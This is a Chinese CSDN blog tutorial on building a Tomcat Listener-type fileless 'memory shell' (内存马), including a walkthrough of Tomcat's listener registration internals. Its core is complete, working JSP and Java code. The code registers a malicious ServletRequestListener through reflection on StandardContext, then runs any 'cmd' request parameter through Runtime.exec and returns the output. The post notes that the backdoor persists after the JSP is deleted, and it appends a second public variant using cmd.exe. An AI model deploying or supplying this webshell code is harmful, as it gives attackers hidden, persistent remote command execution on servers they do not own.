[Java安全]—Tomcat Listener内存马

已于 2022-09-14 14:33:50 修改
阅读量3.2k 收藏 2
点赞数 2
分类专栏: Java 文章标签: tomcat java 安全
于 2022-07-14 17:16:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/125788719
版权

内存马

定义

内存马,也被称为无文件马,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存注册表子项目中或者利用系统合法工具以逃避安全检测的方法。

分类

  • servlet-api类

    ○ listener型

    ○ filter型

    ○ servlet型

  • spring类

    ○ 拦截器

    ○ controller型

  • Java Instrumentation类

    ○ agent型

Listener

顾名思义就是监听器,他能够监听一些事件从而来达到一些效果。在请求网站的时候, 程序先执行listener监听器的内容:Listener -> Filter -> Servlet

Listener是最先被加载的, 所以可以利用动态注册恶意的Listener内存马。而Listener分为以下几种:

  • ServletContext,服务器启动和终止时触发
  • Session,有关Session操作时触发
  • Request,访问服务时触发

request只要访问服务就能触发,所以listener的request方式最适合做内存马

环境配置

idea配置tomcat_a大数据yyds的博客-CSDN博客_idea tomcat

添加个Tomcat服务,里边这些选项不需修改的话默认即可

在这里插入图片描述

File->Project Structure在Modules中我们可以看到我们项目Module。右键,Add一个Web。

在这里插入图片描述

添加好后设置好web.xml路径和index.jsp的路径

在这里插入图片描述

配置好Modules,我们再配置Artifacts。在Artifacts中,点击绿色加号。选择Web Application:Exploded,然后再选择我们刚配置的Moudules

在这里插入图片描述

在Tomcat Server设置刚刚刚添加好的war_exploded即可

在这里插入图片描述

恶意Listener构造

Listener 必须实现 EventListener 接口

在这里插入图片描述

可以看到有很多接口继承自 EventListener ,那么如果我们需要实现内存马的话就需要找一个每个请求都会触发的 Listener

在这里插入图片描述

找到了ServletRequestListener

public interface ServletRequestListener extends EventListener {
    default void requestDestroyed(ServletRequestEvent sre) {
    }

    default void requestInitialized(ServletRequestEvent sre) {
    }
}

用于监听ServletRequest对象的创建和销毁,当我们访问任意资源,无论是servlet、jsp还是静态资源,都会触发requestInitialized方法这里做个demo测试下

Listener.java

package memoryshell;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;

public class Listener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("执行了TestListener requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("执行了TestListener requestInitialized");
    }
}

web.xml,这里填写自己包的位置即可

<listener>
        <listener-class>memoryshell.Listener</listener-class>
</listener>

运行后成功执行我们预定义的方法

在这里插入图片描述

找到了适合的 Listener 之后,我们就可以在其基础上进行内存马的编写,所以接下来我们只需要解决以下两个问题就可以了

  1. 恶意代码写在哪里?
  2. Tomcat 中的 Listener 是如何实现注册的?

恶意代码写在System.out.println("执行了TestListener requestInitialized");这里就好了

而在Listener 这里提供了 ServletRequestEvent 类型的参数,从名字可推测出为 Servlet请求事件

public void requestInitialized(ServletRequestEvent sre) {}

做内存马那我们就需要获取传入的请求,即:cmd=whoami

http://localhost:8081/Java_Security_war_exploded/listener.jsp?cmd=whoami

所以我们需要寻找 sre 的一个方法来获取到请求,找到了getServletRequest 方法,根据名字也能看出获取request请求

跟进看一下,这里返回的类型是ServletRequest接口的实现类类型

在这里插入图片描述

所以本地调试一下看看用到的是哪个实现类的类型

public void requestInitialized(ServletRequestEvent sre) {
    System.out.println(sre.getServletRequest());
}

返回的是RequestFacade类型

org.apache.catalina.connector.RequestFacade@791bd73a
执行了TestListener requestDestroyed

跟进之后发现request 属性中就有这我们需要的 Request类型,所以直接反射获取值即可

在这里插入图片描述

    org.apache.catalina.connector.RequestFacade requestFacade = (RequestFacade) sre.getServletRequest();
    try {
        Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
        requestField.setAccessible(true);
        Request request = (Request) requestField.get(requestFacade);
        System.out.println(request);
    }catch (Exception e){
        e.printStackTrace();
    }

这里就直接构造好了我们需要的类型

在这里插入图片描述

最后把获取的参数值作为我们的 Runtime 的参数就可以了

package memoryshell;

import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;
import java.io.InputStream;
import java.lang.reflect.Field;

public class Listener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("执行了TestListener requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        String cmd;
        try {
            cmd = sre.getServletRequest().getParameter("cmd");
            org.apache.catalina.connector.RequestFacade requestFacade = (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();
            Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
            requestField.setAccessible(true);
            Request request = (Request) requestField.get(requestFacade);
            Response response = request.getResponse();

            if (cmd != null){
                InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                int i = 0;
                byte[] bytes = new byte[1024];
                while ((i=inputStream.read(bytes)) != -1){
                    response.getWriter().write(new String(bytes,0,i));
                    response.getWriter().write("\r\n");
                }
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

直接执行命令

在这里插入图片描述

注册流程

listenerStart()

Listener 既然要被注册进并使用,所以期间肯定会实例化这个类,所以断点打在了class类和命令执行的部分

在这里插入图片描述

直接跟到StandardContext#listenerStart 方法,在4660行进行了实例化,用到参数是listener而listener的值是从listeners来的,listeners又是通过findApplicationListeners()获取的,最后又传入了results中

在这里插入图片描述

findApplicationListeners()返回的是applicationListeners属性

public String[] findApplicationListeners() {
    return applicationListeners;
}

它的值就是我们web.xml写入的值

在这里插入图片描述

接着往下看,首先遍历了 results 数组,然后在 for 循环中根据不同类型的 Listener 添加到了不同的数组中,这里我们的 ServletListener 属于第一个判断,所以被添加到了 eventListeners 数组中

ArrayList<Object> eventListeners = new ArrayList<>();
ArrayList<Object> lifecycleListeners = new ArrayList<>();
for (int i = 0; i < results.length; i++) {
    if ((results[i] instanceof ServletContextAttributeListener)
        || (results[i] instanceof ServletRequestAttributeListener)
        || (results[i] instanceof ServletRequestListener)
        || (results[i] instanceof HttpSessionIdListener)
        || (results[i] instanceof HttpSessionAttributeListener)) {
        eventListeners.add(results[i]);
    }
    if ((results[i] instanceof ServletContextListener)
        || (results[i] instanceof HttpSessionListener)) {
        lifecycleListeners.add(results[i]);
    }
}

接下来调用 getApplicationEventListeners 函数来获取 applicationEventListenersList 属性(即已注册的 Listener),之后存储到eventListeners中,在经过setApplicationEventListeners()进行设置

在这里插入图片描述

跟进setApplicationEventListeners(),先通过clear()清空,在将传入的listeners重新赋值给它

public void setApplicationEventListeners(Object listeners[]) {
    applicationEventListenersList.clear();
    if (listeners != null && listeners.length > 0) {
        applicationEventListenersList.addAll(Arrays.asList(listeners));
    }
}

applicationEventListenersList 是List<Object> 类型的所以这里面存放的都是实例化后的 listener

private List<Object> applicationEventListenersList = new CopyOnWriteArrayList<>();

至此listenerStart就结束了,这部分主要就是进行了listener的存储

fireRequestInitEvent()

在存储后就需要找个触发点,找到了fireRequestInitEvent()这里,最后调用了requestInitialized(event);,也就是我们在listener构造时触发的地方,所以可以通过listener恶意执行代码

在这里插入图片描述

listener是通过instances赋值来了,而instances则是getApplicationEventListeners()的返回值,这就联系到了前边listenerStart()中通过该方法进行存储的地方

public Object[] getApplicationEventListeners() {
    return applicationEventListenersList.toArray();
}

poc构造

<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%!

    class Listen implements ServletRequestListener {

        @Override
        public void requestInitialized(ServletRequestEvent sre) {
            String cmd;
            try {
                cmd = sre.getServletRequest().getParameter("cmd");
                org.apache.catalina.connector.RequestFacade requestFacade = (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();
                Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
                requestField.setAccessible(true);
                Request request = (Request) requestField.get(requestFacade);
                Response response = request.getResponse();

                if (cmd != null){
                    InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                    int i = 0;
                    byte[] bytes = new byte[1024];
                    while ((i=inputStream.read(bytes)) != -1){
                        response.getWriter().write(new String(bytes,0,i));
                        response.getWriter().write("\r\n");
                    }
                }
            }catch (Exception e){
                e.printStackTrace();
            }
        }

        @Override
        public void requestDestroyed(ServletRequestEvent sre) {
        }
    }
%>

<%
    ServletContext servletContext =  request.getServletContext();
    Field applicationContextField = servletContext.getClass().getDeclaredField("context");
    applicationContextField.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);

    Field standardContextField = applicationContext.getClass().getDeclaredField("context");
    standardContextField.setAccessible(true);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

    Object[] objects = standardContext.getApplicationEventListeners();
    List<Object> listeners = Arrays.asList(objects);
    List<Object> arrayList = new ArrayList(listeners);
    arrayList.add(new Listen());
    standardContext.setApplicationEventListeners(arrayList.toArray());

%>

在这里插入图片描述

此时将listen.jsp删除后命令仍可以执行,重启服务器后内存马就不在了

附上网络上公开的内存马:

方式一:

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
%>

方式二:

WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
    StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

test.jsp

<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.io.IOException" %>

<%!
    public class MyListener implements ServletRequestListener {
        public void requestDestroyed(ServletRequestEvent sre) {
            HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();
            if (req.getParameter("cmd") != null){
                InputStream in = null;
                try {
                    in = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",req.getParameter("cmd")}).getInputStream();
                    Scanner s = new Scanner(in).useDelimiter("\\A");
                    String out = s.hasNext()?s.next():"";
                    Field requestF = req.getClass().getDeclaredField("request");
                    requestF.setAccessible(true);
                    Request request = (Request)requestF.get(req);
                    request.getResponse().getWriter().write(out);
                }
                catch (IOException e) {}
                catch (NoSuchFieldException e) {}
                catch (IllegalAccessException e) {}
            }
        }

        public void requestInitialized(ServletRequestEvent sre) {}
    }
%>

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
    MyListener listenerDemo = new MyListener();
    context.addApplicationEventListener(listenerDemo);
%>
S1nJa
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内存Webshell详解
悦分享
11-08 4541
内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久化,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、进程注入等基于内存的攻击手段也受到了大多数攻击者青睐。内存是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到。因此内存近年来越来越被重视,逐渐成为了攻击方的“必备武器”,针对内存的防护也越来越被重视。
TomcatListener&Filter
qq_43502858的博客
05-21 1273
TomcatListener&Filter 1.Listener详解 1.Listener介绍 监听器,监听某一个事件的发生或者某一个状态的改变,不论什么监听器的实现都是基于接口回调,监听器的内部机制就是接口回调。 2.监听器原理 没考虑回调的做法: TestA.java package com.nikehu.demo; public class TestA { public v...
Listener内存
MachinegunJoe777的博客
10-07 46
和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。
从零手写实现 tomcat-12-listener 监听器
最新发布
05-12 414
还记得我们最初 web.xml 中的 listener 吗?-- Listener 配置 --><listener><listener><listener><listener><listener><listener>listener 作用是什么?我们又该如何解析实现呢?这里就不定义了,直接复用 servlet 的标准 api。
深入底层源码的Listener内存(内存系列篇三)
m0_71746299的博客
01-27 309
写在前面 继前面的Filter``Servlet内存技术,这是系列文章的第三篇了,这篇将给大家带来的是Listener内存技术。 前置 什么是Listener? 监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。 监听器的相关概念: 事件:方法调用、属性改变、状态改变等。 事件源:被监听的对象( 例如:request、session、servletContext)。
S07-tomcatListener内存1
08-03
然而,需要注意的是,不恰当的使用或恶意利用Listener可能会导致安全风险,如文中提到的“注入内存”。这通常是指通过Listener在服务器端植入恶意代码,使其在特定条件下执行,从而影响系统的安全性。 总之,...
Tomcat容器攻防笔记之Listener内存 .pdf
09-05
总的来说,Listener内存是一种高级攻击技术,它利用了Tomcat容器的内在机制来绕过常规的安全防御。对于安全建设来说,理解这种攻击手段并采取相应的防护措施至关重要,例如强化应用程序代码审查、监控Listener的...
实例详解Java中ThreadLocal内存泄露
09-01
然而,如果不正确地使用ThreadLocal,可能会导致内存泄露,尤其是在Java EE容器如Tomcat中。本文将深入探讨这个问题,并提供解决方案。 在问题背景部分,我们看到一个示例,其中`LeakingServlet`类内部使用了一个...
java面试题.docx
04-07
* Java Web 的 Filter 和 Listener * Java Web 的会话和 Cookie JVM知识点: * JVM 的架构和组成 * JVM 的类加载机制 * JVM 的内存管理 * JVM 的垃圾回收机制 Kafka 框架知识点: * Kafka 框架的概述 * Kafka 的...
JAVA上百实例源码以及开源项目
01-03
 //给客户发一个感谢消息,消息驱动Bean必须实现两个接口MessageDrivenBean和MessageListener  在对象创建的过程中将被容器调用,onMessage函数方法接收消息参数,将其强制转型为合适的消息类型,同时打印出消息...
memshell:Tomcat 冰蝎内存
04-13
Tomcat 无文件冰蝎内存 使用以下命令创建tomcat容器,并将inject.jar,agent.jar复制到容器中。 docker run -d -ti --net host --name tomcat tomcat:8.0.18-jre8 docker cp inject.jar tomcat:/usr/local/tomcat docker cp agent.jar tomcat:/usr/local/tomcat 使用以下命令将其注入到tomcat进程中。 java -jar inject.jar 123 通过behinder.jar连接内存冰蝎,url格式: http://ip:port/1.jsp?pass_the_world=123&model=chopper 密码: rebeyond
Java Tomcat内存——Listener内存
m0_61506558的博客
12-01 805
监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。事件:方法调用、属性改变、状态改变等。事件源:被监听的对象( 例如:request、session、servletContext)。监听器:用于监听事件源对象 ,事件源对象状态的变化都会触发监听器。注册监听器:将监听器与事件源进行绑定监听对象创建和销毁的监听器监听对象中属性变更的监听器。
Tomcat服务器配置
逝去的往事的博客
07-11 491
Tomcat 服务器配置 Tomcat 服务器的配置主要集中于 tomcat/conf 下的 catalina.policy、catalina.properties、context.xml、server.xml、tomcat-users.xml、web.xml 文件; server.xml server.xml 是tomcat 服务器的核心配置文件,包含了Tomcat的 Servlet 容器(Ca...
Tomcat深入浅出——Filter与Listener(五)
weixin_63597125的博客
07-19 317
本文介绍了Filter过滤器的作用、用途、以及它的设计模式。同时也介绍了两种Listener监听器
listener内存泄漏
yuanbing1988的博客
11-30 2769
之所以写这个,是因为最近公司的app老报oom,所以为了解决这个问题,专门研究了Mat以下这种情况,可能会导致oom刚开始我在QccrLocation这个类中定义了一个接口,在其他的地方实现了这个接口,当需要定位的时候,我把实现了这个接口的对象传了进来然后定位完成后把经纬度返回,这样返回,一切看似正常,但是我再去查看Mat的时候,是这样的就是说退出之后还有对QccrLocation的引用,这可能会导
JavaWeb知识】Web常见的攻击技术
No8g攻城狮的博客
03-24 1024
互联网上的攻击大都将Web站点作为目标。本章讲解具体有哪些攻击Web站点的手段,以及攻击会造成怎样的影响。 针对Web的攻击技术 简单的 HTTP 协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。 应用 HTTP 协议的服务器和客户端,以及运行在服务器上的 Web 应用等资源才是攻击目标。目前,来自互联网的攻击大多是冲着 Web 站点来的,它们大多把Web 应用作为攻击目标。本...
tomcat内存设置
dlycmsmoses的专栏
09-26 401
tomcat:  set JAVA_OPTS=-Xms1024m -Xmx1024m -XX:PermSize=256M -XX:MaxNewSize=512m -XX:MaxPermSize=512m IDE:-Xms256M -Xmx896M -XX:MinHeapFreeRatio=30   /   -Xmx1024M -Xms512M -XX:MaxPermSize=256m
javalistener
05-24
JavaListenerJava 中的一个接口,用于处理事件监听器。当某个动作或事件发生时,JavaListener 可以被触发,从而执行预定义的操作。JavaListener 可以用于各种应用程序中,例如 GUI 程序中的按钮单击事件、网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值